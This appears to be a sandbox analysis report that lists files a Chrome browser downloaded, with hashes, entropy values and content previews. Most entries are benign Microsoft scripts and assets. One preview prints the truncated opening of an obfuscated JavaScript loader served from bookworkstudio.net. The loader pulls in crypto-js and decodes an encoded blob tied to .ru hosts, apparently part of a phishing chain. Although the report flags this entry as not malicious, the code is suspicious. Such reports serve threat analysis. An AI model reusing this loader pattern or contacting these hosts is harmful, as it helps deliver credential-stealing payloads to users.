                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/scripts/telemetry.app-insights.min.76b1179e27869cdca73b.js
                                                                                                                                                                                                          Preview:"use strict";(self.webpackChunkpowerbi_clients=self.webpackChunkpowerbi_clients||[]).push([[0],{720:function(Yc,Ai,mt){mt.r(Ai),mt.d(Ai,{AppInsightsCore:function(){return Ka},ApplicationAnalytics:function(){return Ro},ApplicationInsights:function(){return is},ApplicationInsightsContainer:function(){return Xc},BaseCore:function(){return Ga},BaseTelemetryPlugin:function(){return zt},CoreUtils:function(){return ni},DependenciesPlugin:function(){return ts},DistributedTracingModes:function(){return Oe},Event:function(){return ze},Exception:function(){return we},LoggingSeverity:function(){return k},Metric:function(){return Ze},NotificationManager:function(){return Wa},PageView:function(){return Ve},PageViewPerformance:function(){return lt},PerfEvent:function(){return fn},PerfManager:function(){return ba},PropertiesPlugin:function(){return Go},RemoteDependencyData:function(){return et},Sender:function(){return zo},SeverityLevel:function(){return Cn},Telemetry:function(){return Gc},Trace:funct
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (32098)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):143130
                                                                                                                                                                                                          Entropy (8bit):5.330341741940889
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:dq6o9bcpWoraMVwSrutmMiA+78ffv1N0w9h5fGTWOctxEPEtqQw/etDdgnGOY:2c2fv1N0w9hxxEPEtqQw/4KnGP
                                                                                                                                                                                                          MD5:B2193EE3D1A572C4DE0275BB103C5293
                                                                                                                                                                                                          SHA1:802AB2E55CE99CE6F37253692F7CFD9229EA65A4
                                                                                                                                                                                                          SHA-256:8EE3C3B99F088F30D5C2CAB98F1688E24D5F9333A164C7610310779EF0EC522A
                                                                                                                                                                                                          SHA-512:E79020F2B363A5D4059745B16597B7796EE24DBDE0AFFE331BE611D149B960630839F9D757938C969F4A2D00CF49995F3152D952A32D7A3E473BC4B8CD10C825
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-chat.min.ACSHASHb2193ee3d1a572c4de0275bb103c5293.js
                                                                                                                                                                                                          Preview:/**!.. @license. handlebars v4.7.7..Copyright (C) 2011-2019 by Yehuda Katz..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARI
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (541)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):3642
                                                                                                                                                                                                          Entropy (8bit):5.399452635270733
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:yjXZ9sAK618PFA5Hvsy15vm9sgsTO7wdNTB:yjXPT2Sb15vkl7wdN9
                                                                                                                                                                                                          MD5:BE3F2A9F6A41FC40556EFE260FC861A5
                                                                                                                                                                                                          SHA1:EF6D673802EDF44C01EEA9DD86DF4E5ACD21757E
                                                                                                                                                                                                          SHA-256:C94F3B6AA377CFC8D9416F38AEDF1E49C43DE0BDC6726858720610827DF2DD3E
                                                                                                                                                                                                          SHA-512:05ED779F490E9F21153E0C6838198A9E5337C4361644E62A5C99BCA3978001840CAC2E947874983FABF15573FDDA548567176F77B0393A827E27E47ECB01792A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/exp-cookiecomp/v1.min.ACSHASHbe3f2a9f6a41fc40556efe260fc861a5.js
                                                                                                                                                                                                          Preview:'use strict';window.ExpConsentUtils=window.ExpConsentUtils||{};window.ExpConsentUtils=function(){return{waitForObj:function(f){return new Promise(function(d,c){var h=0,k=setInterval(function(){100>h?"visitor"==f&&"object"===typeof visitor&&visitor||"consent"==f&&"undefined"!==typeof WcpConsent&&WcpConsent&&"undefined"!==typeof WcpConsent.siteConsent&&WcpConsent.siteConsent&&"undefined"!==typeof GPC_DataSharingOptIn&&null!=GPC_DataSharingOptIn?(clearInterval(k),d()):h++:(clearInterval(k),c())},50)})}}}();.var ExpConsentHandler=function(){function f(){window.ExpConsentUtils.waitForObj("visitor").then(function(){visitor.getVisitorValues(function(a){adobe.target.trackEvent({mbox:"personalizationConsent"})})}).catch(function(a){console.log(a)})}function d(){return WcpConsent&&WcpConsent.siteConsent&&void 0!==WcpConsent.siteConsent.isConsentRequired&&null!==WcpConsent.siteConsent.isConsentRequired?WcpConsent.siteConsent.isConsentRequired:!0}function c(){var a=WcpConsent&&WcpConsent.siteConse
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (505)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):1418
                                                                                                                                                                                                          Entropy (8bit):5.418786110345074
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:gkWndJbDZVHGCGH0199EYCDNQNFHOS91AqCCoW40HJtmz2Xw+mlu4oFU5kveTOwD:gkw9ZVHG3HEuvNQNFv16XW1HJEkmEhUh
                                                                                                                                                                                                          MD5:20AAFDF6904D3DC5DB0E0E33ABBFC1A4
                                                                                                                                                                                                          SHA1:CC1A639FF69FE0D8A8F1EFEE7FCB04941E7B57C8
                                                                                                                                                                                                          SHA-256:EE4E620F350907CE3867454B2BD45984BE949EB46B113183D4B8B403032DA14D
                                                                                                                                                                                                          SHA-512:91B0BD81FCD2D3D040D9FC1DB74F5CA916EF88E7887D2868530BF1319EAF5462CC54421AB80FC97B258B569B9AF40F2B9FD1B6D417C9A4561BBA22EDF785D905
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-jquery-cookie.min.ACSHASH20aafdf6904d3dc5db0e0e33abbfc1a4.js
                                                                                                                                                                                                          Preview:/*. jQuery Cookie Plugin v1.4.1. https://github.com/carhartl/jquery-cookie.. Copyright 2013 Klaus Hartl. Released under the MIT license.*/.'use strict';(function(d){"function"===typeof define&&define.amd?define(["jquery"],d):"object"===typeof exports?d(require("jquery")):d(jQuery)})(function(d){function l(a,c){if(e.raw)var b=a;else a:{0===a.indexOf('"')&&(a=a.slice(1,-1).replace(/\\"/g,'"').replace(/\\\\/g,"\\"));try{a=decodeURIComponent(a.replace(m," "));b=e.json?JSON.parse(a):a;break a}catch(h){}b=void 0}return d.isFunction(c)?c(b):b}var m=/\+/g,e=d.cookie=function(a,c,b){if(void 0!==c&&!d.isFunction(c)){b=d.extend({},e.defaults,b);.if("number"===typeof b.expires){var h=b.expires,g=b.expires=new Date;g.setTime(+g+864E5*h)}a=e.raw?a:encodeURIComponent(a);c=e.json?JSON.stringify(c):String(c);c=e.raw?c:encodeURIComponent(c);return document.cookie=[a,"\x3d",c,b.expires?"; expires\x3d"+b.expires.toUTCString():"",b.path?"; path\x3d"+b.path:"",b.domain?"; domain\x3d"+b.domain:"",b.secure?";
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):308
                                                                                                                                                                                                          Entropy (8bit):4.70981696594715
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6:wuCcUdfN1nwuTR6XEOW8HX3Lfau6ZlKvpuECSgwuEj2an:J8nnNR6xp3765VJa
                                                                                                                                                                                                          MD5:D54C23BA76BD8648119795790AE83779
                                                                                                                                                                                                          SHA1:D8D52ACAEB44EF8D5ED93D3EB65465AEFC8E8EA7
                                                                                                                                                                                                          SHA-256:50F43ABADD35CC811C5C927FA149DD93E18707562D9961D82208B3261E2C1A34
                                                                                                                                                                                                          SHA-512:1844CD63F89AA92C33D9D7E691B1F8DFB55F3195E86FB359719E6E81E82A98C5BBE3889D33C37499768F51DF5A48BF0633254F64E3257572566D444CCFC26FF9
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/core/wcm/components/tabs/v1/tabs/clientlibs/site.min.ACSHASHd54c23ba76bd8648119795790ae83779.css
                                                                                                                                                                                                          Preview:.cmp-tabs__tablist{display:flex;flex-wrap:wrap;padding-left:0;list-style:none}..cmp-tabs__tab{box-sizing:border-box;border-bottom:1px solid transparent;padding:.5rem 1rem;cursor:pointer}..cmp-tabs__tab--active{border-color:inherit}..cmp-tabs__tabpanel{display:none}..cmp-tabs__tabpanel--active{display:block}
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):681
                                                                                                                                                                                                          Entropy (8bit):5.043291133932798
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:tr1tB3ut9BKXWsFYZjzFWZ8ed8Rfc3EnDiHAxcmjnDiHAxc1tnDiHA/KLtkiHAie:tTB3ut90XOsZ58Rf2ADHxvDHxkDH/Ek7
                                                                                                                                                                                                          MD5:104138E7B8F89DBF7CC66485544A0669
                                                                                                                                                                                                          SHA1:7C3F43BDA4BAF55F893876DC62B55800E194F135
                                                                                                                                                                                                          SHA-256:FCA9EEC67C99F083AF9AA30169AF20B7DE12949D45A48FACC70B061F1F0FCBE0
                                                                                                                                                                                                          SHA-512:7BE127AE63F31606BFC909476F8ACF4857726E6C5A7CCCE06FF6EB713CFA328DB58B2FBDBBB298D59030CED8853AEE4771D865DCAA487871E6F71E79CE687F98
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/Ai-icon-dark
                                                                                                                                                                                                          Preview:<svg width="43" height="32" viewBox="0 0 43 32" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_14400_15452)">.<path d="M0 14.9335C0 6.68606 6.65493 0.000183105 14.8642 0.000183105H28.1358C36.3451 0.000183105 43 6.68607 43 14.9335V17.0669C43 25.3143 36.3451 32.0002 28.1358 32.0002H0V14.9335Z" fill="#004275"/>.<ellipse cx="12.6195" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.<ellipse cx="21.0326" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.<ellipse cx="29.4457" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.</g>.<defs>.<clipPath id="clip0_14400_15452">.<rect width="43" height="32" fill="white"/>.</clipPath>.</defs>.</svg>.
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):9849
                                                                                                                                                                                                          Entropy (8bit):4.327507698755054
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:0OQGrOUjDYq5FEF/zj2wrEEegbSYCkK2MlXW2UqEcK9MwC1uAyI9J3Yullgubepd:DrzjDYq5FEFLjRJpKJxWrqhKGXy83Y39
                                                                                                                                                                                                          MD5:08C5F9CB4220E78FF920DAE3A7A8ED53
                                                                                                                                                                                                          SHA1:06063CC0DE00B0F698B07DEB66DDEDE5C60940E7
                                                                                                                                                                                                          SHA-256:E8B12100E50470AE78CA039D5662394A89E01C61FE8D4682DFE606E906E677ED
                                                                                                                                                                                                          SHA-512:0E7ED8C068FA14123041314F58C1473DF3EB60C3B6CE1A95B1A7066C1B151D5D7EC6F2D585B2862721DB164B9CE79E61DFB6FB0A53951504BB2235739B4C35F6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/reimagine/clientlib-reimagine-base.min.ACSHASH08c5f9cb4220e78ff920dae3a7a8ed53.js
                                                                                                                                                                                                          Preview:(function() {. "use strict";.. var $uhfSkipToMain = $("#uhfSkipToMain");. var $acomHeaderSkipToMain = $(".azure-skip-nav");. var href = "";. if($uhfSkipToMain.length) {. href = $uhfSkipToMain.data("href");. href = href && href.replace("#", "") || "mainContent";. } else if($acomHeaderSkipToMain.length) {. href = $acomHeaderSkipToMain[0].getAttribute("href");. href = href && href.replace("#", "") || "main";. }.. $('.microsoft-template-layout-container').attr("id", href);.})();.// This function replaces popover data-island tags insertd in RTE via the popover plugin.(function () {. if (!window || !window.ocrReimagine) {. return;. }.. window.ocrReimagine.PopoverRichTextPlugin = new class {. popoverRichTextMountSelector = '.popover-rte-mount';. popoverMountSelector = '[data-mount="popover"]';.. isPopoverComponentEnabled() {. return !!(window.mwf?.Popover);. }.. isIconComponentEna
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):11232
                                                                                                                                                                                                          Entropy (8bit):4.6331503450371505
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:tgwsKEAOoPWvmsljFvgWIxQ7Mvdtdt+6HaAyawyQnMvxgGZUOxhBLz6PsF7TAVNQ:OKbO97gW54VPiTpnMvxDXVWxRWeE
                                                                                                                                                                                                          MD5:7FA2105E727E504AAF2557640251B9A6
                                                                                                                                                                                                          SHA1:341F9959BEC50971198680145E37E77177F83C6D
                                                                                                                                                                                                          SHA-256:C7AAA9B5376FDE8B3DE7A92A84E336A161D4232D6238874173B305CA32567D41
                                                                                                                                                                                                          SHA-512:378A637DF8E0905FBE992B8CC9F646A95640EDB4AE8A0ADCFA0DE5BF004B239FC3D5F742991BE0322C79EE72A7FA1F8E6CC68EEBC18BF205D1718FA845C7F7F7
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine-page/clientlib-chatgpt-drawer.min.ACSHASH7fa2105e727e504aaf2557640251b9a6.js
                                                                                                                                                                                                          Preview:(() => {. const ATTRIBUTE_SELECTORS = {. DATA_MOUNT_CHAT_AI_DRAWER: '[data-mount="ai-chat-drawer"]',. };.. const ATTRIBUTES = {. IS_AUTHOR: 'data-is-author',. IS_ENV_PROD: 'data-is-env-prod',. PARAMS: 'data-params',. };.. const EventName = {. KEY_DOWN: 'keydown',. WEBCHAT_CONNECT_FULFILLED: 'webchatconnectfulfilled'. };.. const Selector = {. WEB_CHAT_FEED: '[role="feed"]',. FOOTNOTE_LINK: '.ac-horizontal-separator + .ac-container a, .webchat__link-definitions__list-item-box--as-link',. ACTION_SET_BUTTON: '.ac-pushButton:not(.action--ai-feedback)',. POSITIVE_FEEDBACK_BUTTON: '[id$="-positive"] .ac-pushButton',. NEGATIVE_FEEDBACK_BUTTON: '[id$="-negative"] .ac-pushButton',. RELATED_LINKS: '[id$="-related"] .ac-anchor'. };.. // Constant values for the AI Chat Drawer component.. const IS_AUTHOR = document.querySelector(ATTRIBUTE_SELECTORS.DATA_MOUNT_CHAT_AI_DRAWER).getAttribute
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ru/injqzmaorhcfcmoaukflhkifyNZxGCKNYHHPPVNBFPELBOVUYIFNOCEPIRMUSC
                                                                                                                                                                                                          Preview:1
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (12824)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):58060
                                                                                                                                                                                                          Entropy (8bit):5.596324920359172
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:EFkYe2qD3D1Ug5yKiXcvh5kCThY6g3Eh6rtLMs5M:SY5yKiSin7RFy
                                                                                                                                                                                                          MD5:1986FCF12655BE6003E39A655BEB6F0F
                                                                                                                                                                                                          SHA1:0C90899E47927E6D63E445B6BFE9C986E8621830
                                                                                                                                                                                                          SHA-256:F66185BEC9D95EC9E4C49D1B38F433AB51AEF9853B21B5D3C0DA54F3987EAF0C
                                                                                                                                                                                                          SHA-512:FAD912AC31C6297A4D4EAA4FC263C5EF8ECA0281D79213B64CE606BBC124B0BFD7F1CADF47C34560406AC804EEF87922E25F7D054B3C539F3AE95D30C8EE7FAB
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/msonecloudapi/assets/msochead.js
                                                                                                                                                                                                          Preview:/*! Static Override Utilities */.(()=>{window.SOUtil=window.SOUtil||{addStylesheet:(cssStyles,overrideId)=>{const style=document.createElement("style");if(overrideId){style.id="static-override-"+overrideId}style.appendChild(document.createTextNode(cssStyles));document.head.appendChild(style)},pageIsInScope:pageScope=>{const host=location.hostname;const path=location.pathname;const locale=document.documentElement.lang.toLowerCase();const getMarket=marketAware=>{const locale=document.documentElement.lang.toLowerCase();const langCode=locale.split("-")[0];const market=new URLSearchParams(location.search).get("market")?.toLowerCase();if(market&&marketAware!==false){return`${langCode}-${market}`}return locale};const langLocs={"sr-rs":["sr-rs","sr-latn-rs","sr-cyrl-rs"],default:[locale]};const possibleLangLocs=langLocs[locale]||langLocs.default;const pathLocale=possibleLangLocs.find(loc=>path.indexOf(loc)!==-1);const pathNoLocale=path.replace(`/${pathLocale}`,"").replace(/\/$/,"");const previ
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):325222
                                                                                                                                                                                                          Entropy (8bit):5.367691970984338
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:eh3BXzfo0nueZL7scQM+Jfp9LWdox+jiQxLxZP6tPIxCeNWNKjPDU+WY:23BMU1scQMqyd2+jx3GIxdWNKrDX
                                                                                                                                                                                                          MD5:AD3820649595F8A338E9BD7664698B79
                                                                                                                                                                                                          SHA1:EA4A174DBD3F9479DBB576B0125E367B773D19EC
                                                                                                                                                                                                          SHA-256:6EC567D0DD63DACDC972CE300766DE3083D7241700F4BAEB851F0347577E0512
                                                                                                                                                                                                          SHA-512:652FFD4376A3179BDA5BA5AA4C20F9B1B7E6BF533713E0B7451EFC3C61ADB87E4C1BBA409855499A808C3D48CCBDD02C9A097C3D3968EBCDF3602E219F961206
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:!function(){var j,J,dv={862:function(j){j.exports=function(J){var M={};function U(A){if(M[A])return M[A].exports;var b=M[A]={i:A,l:!1,exports:{}};return J[A].call(b.exports,b,b.exports,U),b.l=!0,b.exports}return U.m=J,U.c=M,U.d=function(A,b,w){U.o(A,b)||Object.defineProperty(A,b,{enumerable:!0,get:w})},U.r=function(A){typeof Symbol<"u"&&Symbol.toStringTag&&Object.defineProperty(A,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(A,"__esModule",{value:!0})},U.t=function(A,b){if(1&b&&(A=U(A)),8&b||4&b&&"object"==typeof A&&A&&A.__esModule)return A;var w=Object.create(null);if(U.r(w),Object.defineProperty(w,"default",{enumerable:!0,value:A}),2&b&&"string"!=typeof A)for(var V in A)U.d(w,V,function(v){return A[v]}.bind(null,V));return w},U.n=function(A){var b=A&&A.__esModule?function(){return A.default}:function(){return A};return U.d(b,"a",b),b},U.o=function(A,b){return Object.prototype.hasOwnProperty.call(A,b)},U.p="",U(U.s=90)}({17:function(J,M,U){"use strict";M.__esModule=!0,M.d
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1739
                                                                                                                                                                                                          Entropy (8bit):4.05445408846263
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:n/Egn6TVRKHTLISujRXKBhsAq47Rt0MzVDIRwiBuAx8ZpRVXlxw8Rf+ZJE30DE:nMgn6SHTLISoKBhsA7X0MVEJhA
                                                                                                                                                                                                          MD5:2D2AAD649742385AEBE585E25E433E32
                                                                                                                                                                                                          SHA1:6510C1B80C83B1996337CB01580AC62C89623B1F
                                                                                                                                                                                                          SHA-256:A8BE8B07C5EC53009017FF86D0FBED11A706B22332F1BFB1AE5FD1B84638F94B
                                                                                                                                                                                                          SHA-512:32AFE4FF96112017F6FFF8A9CAF377CFB1248B2B9078818D065CF70D0FB82C894B850FD085164BFE2325BA54394E6B5A6DBC6FEF094FAE177C547DA958E400B7
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M6.25 12.4974C7.2165 12.4974 8 13.2809 8 14.2474V16.7474C8 17.7139 7.2165 18.4974 6.25 18.4974H3.75C2.7835 18.4974 2 17.7139 2 16.7474V14.2474C2 13.2809 2.7835 12.4974 3.75 12.4974H6.25ZM13.25 12.4974C14.2165 12.4974 15 13.2809 15 14.2474V16.7474C15 17.7139 14.2165 18.4974 13.25 18.4974H10.75C9.7835 18.4974 9 17.7139 9 16.7474V14.2474C9 13.2809 9.7835 12.4974 10.75 12.4974H13.25ZM20.25 12.4974C21.2165 12.4974 22 13.2809 22 14.2474V16.7474C22 17.7139 21.2165 18.4974 20.25 18.4974H17.75C16.7835 18.4974 16 17.7139 16 16.7474V14.2474C16 13.2809 16.7835 12.4974 17.75 12.4974H20.25ZM6.25 13.9974H3.75C3.61193 13.9974 3.5 14.1094 3.5 14.2474V16.7474C3.5 16.8855 3.61193 16.9974 3.75 16.9974H6.25C6.38807 16.9974 6.5 16.8855 6.5 16.7474V14.2474C6.5 14.1094 6.38807 13.9974 6.25 13.9974ZM13.25 13.9974H10.75C10.6119 13.9974 10.5 14.1094 10.5 14.2474V16.7474C10.5 16.8855 10.6119 16.9974 10.75 16.9
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):49911
                                                                                                                                                                                                          Entropy (8bit):7.994516776763163
                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                          SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                                                                                                                                                          MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                                                                                                                                          SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                                                                                                                                          SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                                                                                                                                          SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                                                                                                                                                          Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1317), with CRLF line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):1956
                                                                                                                                                                                                          Entropy (8bit):5.9625000388536575
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:o7buWWgNEFJx/KXGr36TsxX/EwKrxBACG7uIt/pWwE:oMgNEFDKXGrKTc/FKQ77uItxWwE
                                                                                                                                                                                                          MD5:E50D14271E35F2D7BA0964356484D872
                                                                                                                                                                                                          SHA1:BF175DC9D5490D71A51E5CC0C632325254931F8C
                                                                                                                                                                                                          SHA-256:E054F49DBFA3EEB380B8B637E2CEC43651A1A2A87B6EE3E37A02E3084DF28732
                                                                                                                                                                                                          SHA-512:9D84F681A6CD912997F568170F3B1111EA7C8DCAD32D81E463919D45B92D7718F8D414B99A3B546AFC45AFBEEC9B43A494AB05934742BB6B60FD208C559BAD66
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://bookworkstudio.net/res444.php?2-68747470733a2f2f32312e7a6f6d656c6f72652e72752f72774448725657452f-drongo
                                                                                                                                                                                                          Preview: var GybIrsDwWVGCnTvn = document.createElement("script");..GybIrsDwWVGCnTvn.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(GybIrsDwWVGCnTvn);..GybIrsDwWVGCnTvn.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiWHlXazZPUFFlZ1lVVmh5QUJLSTBmK0xvZGVwTk0xYVBscnRLKzJyU3NwTlM0MHdzaStMYlM4N1RXR1ZDamVFXC9oRWVOTzNuQmxkMStEXC9odXlVekRPcGZzRzMwQnhnVmZZRlNoRE9uS0dpR0pEV2lIdUR3ZG43Sit1OWtKUVZMSnl3NDUxMVwvZU9vQkZ1dUpuQ09EYTNWK3o4UGpCZ0hqNGEwQko5V3Z0dzYwWDhoZWtJaXhUYURYeVZSSlZrS3BWVkFMd0dyVzliKzZaWlFPemIya1Q5Tncrb0RWb2lwTG5RUFd1ODZkZElLMklVWWx4WmNYcmlJbUlwV1hxV1RzRUc5S1hxR2ZWSTBta1hqanNSVUZkUlpOcTMyalkrTGEwWTY0Vml6eElkRkNQM0hCUCtkTmlYRjVRV1h0aWxvak5na2tCUWZtQTFmS1ZDVlluV0VpY1JxXC9JVkN0ZG1rR0xuMlZ6OXBZbktUZTFMa0lRT3ROSkJGT1piRVZhYytKU2NtejRBZ1BQaWw0RkFJNzM2bExwT2ZGMXFkdlRFM3d5a1FkVkJWTml5UnR3SkFoclNmeWFoaUp2YThVTXJYaW9DUitZaTRcL3FrODVTZDN6ZGJKR3kxaVVOTUlLeUR2M2NqUmxMNE9SWm84em9FdmlVcTZ0ZE1VMTQ4VkdFUFArWVFIeE84TnRaaCtHcG
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13110
